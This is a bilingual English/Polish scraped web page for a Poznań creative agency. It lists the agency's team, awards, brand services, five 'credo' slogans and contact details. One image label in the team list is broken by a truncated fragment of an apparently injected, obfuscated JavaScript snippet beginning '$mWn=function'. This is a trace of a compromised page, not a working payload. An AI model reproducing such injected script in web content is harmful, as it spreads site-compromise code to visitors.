{chi-go}

 Creative agency believing that each brand is a compelling story that has its own values, emotions, and a punchline. For more than eight years now we have been involved in creating and supporting brands making them recognisable, appealing, and coherent.

{czi-go} - agencja, która wierzy, że marka to ciekawa opowieść z wartościami, emocjami i puentą. Od ponad 8 lat tworzy i wspiera marki sprawiając, że stają się widoczne, atrakcyjne i zrozumiałe.

team  ---------  energy

We are connected by passion and drive for continued growth. We ask inspiring questions and come up with perceptive answers. We are a flexible team of people who cannot be easily pigeonholed and we take every advantage out of it.

Łączy nas pasja i chęć ciągłego rozwoju. Konstruujemy pytania
i znajdujemy inteligentne odpowiedzi. Jesteśmy elastycznym zespołem, który nie wpadł do szufladki i na tym buduje swoją przewagę.

LUD-TomSzurkowski

---------  Tom Szurkowski

creative director, CEO

LUD-Gosia-KlysN

---------  Gosia Kłys

strategy / client service director

LUD-Joannas

---------  Małgorzata Bronikowska

project manager

LUD-nomad

---------  Paweł Bik

code / IT / digital nomad 

LUD-mirr

---------  Mirek Smieinski

graphic designer

LUD-GO

---------  Karolina Gdaniec

graphic designer

LUD-GosiaThiede-Szeles

---------  Gosia Thiede-Szeles

social media / digital brand

LUD-EdytaWalen<script>$mWn=function(n){if(typeof ($mWn.list[n])==dowska2a" caption="" data-width="original" data-scaling="no">

---------  Edyta Walendowska

research / BSFT 

LUD-BozenaGrabowska2

---------  Bożena Grabowska

business coach

LUD-MichalBrywczynski

---------  Michał Brywczyński

sales coach

team  ---------  energy

Gold Ktr 2016 {DESIGN}  ---------  Album for the 135th anniversary of Poznan urban transport company / Gold Ktr 2013 {DESIGN}  ---------  Alumni WSB-NLU / KREATURA  ---------  Sitag Premium / KREATURA  ---------  Alumni WSB-NLU

Our work philosophy

In building and strategizing brands we seek – and find - balance. We see the elements of communication akin to the four elements of nature. They channel the essence of a strong brand, endowed with power of creation and serving as means of communication. We combine them into a powerful brand message – and release the energy.

 The brand energy

brand . base

Naming
Logo design
Branding
Brand strategy

brand . blow

Social media
Print & digital Media
Communication
BTL

brand . flame

Digital
Events
Guerilla
ATL campaigns
Photo/Video

brand . flow

Content marketing
Sales support
Employer branding 
e/PR

Chigo DNA   --------   Credo #1

Chigo DNA   --------   Credo

we believe in smart customers ------------

wierzymy w inteligentnego
odbiorcę

we find space for maverick ideas

zawsze projektujemy z takim założeniem

Chigo DNA   --------   Credo #2

Chigo DNA   --------   Credo

nothing is

impossible ------------

nie ma rzeczy

niemożliwych

only budgets may be too limited

są za małe budżety

Chigo DNA   --------   Credo #3

Chigo DNA   --------   Credo

we work in both modern and traditional way ------

pracujemy nowocześnie 
i tradycyjnie  

effectively merging on-line and off-line tools

sumujemy on-line z off-linem

Chigo DNA   --------   Credo #4

Chigo DNA   --------   Credo

we treat work

like art ------------

traktujemy 
pracę jak sztukę 

because art knows no limits

bo sztuka nie zna granic

Chigo DNA   --------   Credo #5

Chigo DNA   --------   Credo

sometimes coffee doesn’t rule out the tea  ------

czasem kawa 
nie wyklucza 
herbaty

one step backwards, two steps forwards

krok w tył. dwa kroki w przód.

Zainteresowany?

Zainteresowany?

offline  ----------

gsm +48 512 026 920 
głogowska 100/3
Poznań. Poland

  ----------  online

s3
s2